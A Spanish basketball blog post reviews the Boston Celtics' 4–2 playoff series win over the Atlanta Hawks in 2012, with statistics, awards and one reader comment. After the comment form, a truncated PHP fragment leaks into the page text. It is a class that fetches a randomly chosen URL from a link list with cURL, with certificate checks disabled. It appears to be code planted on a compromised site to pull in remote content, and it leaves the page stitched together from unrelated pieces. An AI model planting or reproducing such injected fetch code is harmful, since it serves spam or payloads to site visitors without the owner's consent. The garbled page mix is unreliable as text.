Resumen Celtics 4 – Hawks 2

12 de May de 2012 por Sancho88

Eliminatoria bastante previsible y totalmente ajustada a lo que esperábamos de ella: mucho baloncesto táctico, mucha defensa en estático y decidiendo los de siempre: Paul Pierce y Kevin Garnett. ¿Quiénes si no? No nos engañemos, los segundos finales de los últimos dos partidos de la serie fueron apretados, pero Boston ya había robado el factor cancha en el segundo partido de las serie aprovechando la lesión de Josh Smith. Ahí estuvo la clave. Tras vencer cómodamente sus dos envites posteriores en casa para poner el 3-1, la eliminatoria era cuestión de tiempo, como el gatito que se sienta a esperar a que salga el ratón de su guarida. Pieza fácil. El Garden fue la jaula.

Los Hawks, por su parte, en su línea. Alternan primeras rondas y semifinales de Conferencia sin demasiada fe en sí mismos desde hace muchos años. No se podía esperar otra cosa que no fuera un batacazo de Smith y sus acomodados compañeros, sabiendo que suelen ser ‘sospechosos habituales’ a partir del mes de mayo. Se nos antojan muy escasos los 16,8 puntos por partido de Smith con un inaceptable 39% en tiros de campo, aunque en rebotes superó los 13 por partido. Demasiado poco para lo que esperábamos que hiciera en la faceta anotadora, teniendo en cuenta su gran temporada regular. Si Brandon Bass es un muro que no puedes superar, no esperes ser nunca primera espada en un equipo grande. No obstante, tampoco vamos a obviar que ha jugado lastrado por la lesión de rodilla del segundo partido. A partir de ahí, tan solo fue una copia de los chinos de sí mismo. Joe Johnson bajó también sus prestaciones, aunque no evadió ser la primera referencia en el ataque. Poco acierto y muchas pérdidas, sin embargo. No fue un arma decisiva en los momentos calientes de la eliminatoria. Por poner alguna excusa, las lesiones de Pachulia y McGrady, además de los juegos iniciales sin Horford, han dejado sin fondo de armario a los Hawks durante toda la serie, siendo inexistente la aportación de los Marvin Williams, Hinrich, Ivan Johnson… Vamos, lo esperable. Por otra parte, llama la atención que los anotadores de los Hawks, es decir: Johnson, Smith, Teague y Horford, hayan tenido porcentajes tan bajos de anotación y hayan acumulado casi todas las pérdidas de su equipo.

Una vez más, y esta vez citaré a Joaquín Sabina en ‘Violetas para Violeta’, los Celtics ‘decidieron que en mi pago, sobraban las serenatas’. Un genio desde la banda y los perros de presa desde el parqué impusieron el ritmo y las condiciones de negociación. Forzar más de 15 pérdidas por partido al rival y defenderlos hasta bajar 14 puntos (de 96,6 puntos a casi 82) su media anotadora de temporada regular tiene mucho mérito. Rivers vuelve a colgarse la medalla de gran estratega gracias a estos datos y ya está a pocos pasos del general cartaginés Anibal, de Napoleón Bonaparte, y del señor que comenzó la leyenda en los Celtics: Red Auerbach, quien alcanzó los 90 triunfos en postemporada. Casi nada. Con la victoria en el sexto partido de la serie, Doc Rivers se ha convertido en el tercer mejor entrenador de la larga historia céltica en Playoffs. El segundo es K.C. Jones, que sumó 2 anillos en los 80’ y 65 victorias en las series finales.

Predijimos el 4-2, como también la gran superioridad en la pintura del jugador ‘más sucio del planeta’: Kevin Garnett (impagables sus declaraciones en los post partidos, como siempre; un auténtico show. El perro-lobo jamás dejará de ladrar). Además, Rondo no pudo completar el record de asistencias consecutivas de John Stockton, y se quedó a solo dos juegos de hacer historia. Sus últimas 8 asistencias parecen escasas hablando de quien hablamos. Su ‘pechazo’ por la espalda al árbitro en el primer juego denotaba frustración, que más tarde se tradujo en redención durante el tercer partido de la serie, al firmar su séptimo triple-doble de la temporada: 17 puntos, 14 rebotes y 12 asistencias. Por tanto, nada que reprocharle al bueno de Rondo. No hubo mucho más que rascar. Jeff Teague no pudo imponer el ritmo que les beneficiaba a los Hawks, salvo en momentos puntuales, y Horford volvió como los héroes para caer como los condenados, con su tiro libre final fallado en el último partido de la serie que alejaba definitivamente la eliminatoria para los ‘Halcones’. Sería muy bonito decir aquello de ‘otra vez será’, pero Atlanta huele a reconstrucción, Smith termina contrato en 2013 y nadie duda de que será una de las piezas codiciadas del verano NBA. Los Celtics continúan con su epílogo y avistan su próxima pieza a cobrar en Philadelphia. El trébol resiste y Ray Allen está descansado. Otro motivo más para temerles.

PREMIOS

MVP: Kevin Garnett. Sus 19 puntos y 10 rebotes por partido, además de casi 2 tapones nos han destapado al Garnett más decisivo que se recuerda desde las finales de 2008. Los jugadores de los Hawks, así como su presidente al mando, Michael Gaeron, lo nombraron embajador del juego sucio en el quinto partido, y él respondió finiquitando la eliminatoria con 28 puntos, 14 rebotes, 5 tapones y 3 robos en el sexto, haciendo callar muchas bocas.

No obstante, Garnett no es de esos que te dice ‘yo solo hablo en el campo’. Este fue el momento ‘Big Ticket’ de la eliminatoria, que decantó definitivamente el premio para él:

Quería agradecerle a Gaeron que sus comentarios me hayan dado energía extra hoy. Mi consejo para él es que la próxima vez que abra la boca, sepa qué está diciendo. El hecho de tener una montaña de dinero no te da derecho a abrir la boca.

¡Touché! No obstante, tampoco podemos olvidarnos de Paul Pierce. A pesar de sus problemas de rodilla, el de Compton firmó unos preciosos 21 puntos, 6 rebotes y 4 asistencias en el global de la eliminatoria, logrando el maravilloso 36-14 del segundo partido, y marcándose un ‘Tebow’ por sus huevos toreros. ‘KG’ y ‘The Truth’, exclusivos pero no excluyentes.

Sorpresa: Más que por sus números, la sorpresa debe ser obligatoriamente para Al Horford por lo inesperado de su regreso. Pocos esperaban su participación en la eliminatoria, pero la baja de Pachulia, unida a la lesión de Smith y la vergüenza que uno ha de pasar al sacar a pista a un trozo de carne como Erick Dampier, le hicieron forzar su regreso. 15 puntos y 8 rebotes para él, y la sensación de que vuelve para quedarse, además de no haber perdido ni un ápice de todo su talento. Volvió en el cuarto y fue la clave para alargar la eliminatoria hasta el sexto juego con su gran quinto partido, en el que firmó 19 puntos, 11 rebotes, 3 asistencias, 3 robos y 3 tapones. ‘Abusador, abusador…’ ha regresado con buen pie.

Decepción: Todo el banquillo de los Hawks merece el premio, pero especialmente la dupla Hinrich-Williams, al combinarse para anotar unos escuálidos 13 puntos entre los dos durante toda la serie. Lamentable. En realidad, decepción fueron también el resto de jugadores excepto Horford. Por sensaciones, Atlanta Hawks en bloque volvió a ser la gran decepción de los Playoffs (eso sí, en dura pugna con los Knicks).

Esfuerzo en vano: Aquí también anotamos a Al Horford y su 15-8. Debe ser esfuerzo en vano volver de una grave lesión para esto. No obstante, académicamente, los 17 puntos de Joe Johnson podrían calificarse de mayor esfuerzo en vano, si no fuera por las pérdidas que sumó junto a Smith y Horford: 10 por partido entre los tres. Mucho no se esforzaron los ‘Halcones’, para ser realistas.

Comenta

Un comentario a esta entrada

  1. GreenPride dice:
    #1

    Creo que esta eliminatoria habrá sido la que más gente habrá acertado pues ha pasado lo que muchas quinielas presuponían (entre ellas la mía). Se veía que los viejos verdes podían asaltar Atlanta en cualquier partido pero se veía mucho más complicado que estos Hawks sin alma fueran capaces de asaltar una cancha tan complicada como el Garden. Los Celtics lo volvieron hacer y es para maravillarse de la capacidad y profesionalidad de este equipo. Con 1-0 abajo y sin Rondo por el pechazo-tropezón fueron convencidos de poder llevarse el 2º partido y se lo robaron a los Hawks con un fenomenal Pierce. A partir de ahí la intensidad, defensa y acierto en ataque de Garnett sumado al talento a ratos de Rondo, Pierce y Allen fueron decantando el resto de partidos en el Garden. Sin duda no veíamos a Garnett en tan buena forma desde las finales de 2008 y el paso al puesto de 5 de Rivers es uno de los movimientos tácticos del año. Garnett ha vuelto a ser pieza fundamental posteando en ataque a parte de seguir enchufando de cara al aro a 5-6 metros y eso da a los Celtics más armas en ataque. Pero ya sabemos que donde han ganado los Celtics la eliminatoria ha sido atrás con una gran defensa y sabiendo jugar los clutch excepto el del 5º que se les escapó. Por Atlanta, serie digna pero nada decisiva de Smith y JJ que confirman que son segundos espadas pero no hombres-franquicia. El tiro de Smith en el momento más caliente del 6º, para habernos matao…. pero al menos fue el único capaz de tomar la responsabilidad. El futuro de este equipo pasa por cambiar a algún hombre importante (cualquiera menos Horford en mi opinión) e intentar dar un paso más porque está claro que este equipo difícilmente irá más allá de segunda ronda.
    Los verdes quedan tocados físicamente (Allen, Pierce, Bradley) pero ellos saben jugar así y yo creo que llegarán a las finales de conferencia… pero de eso hablaremos en otro post

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>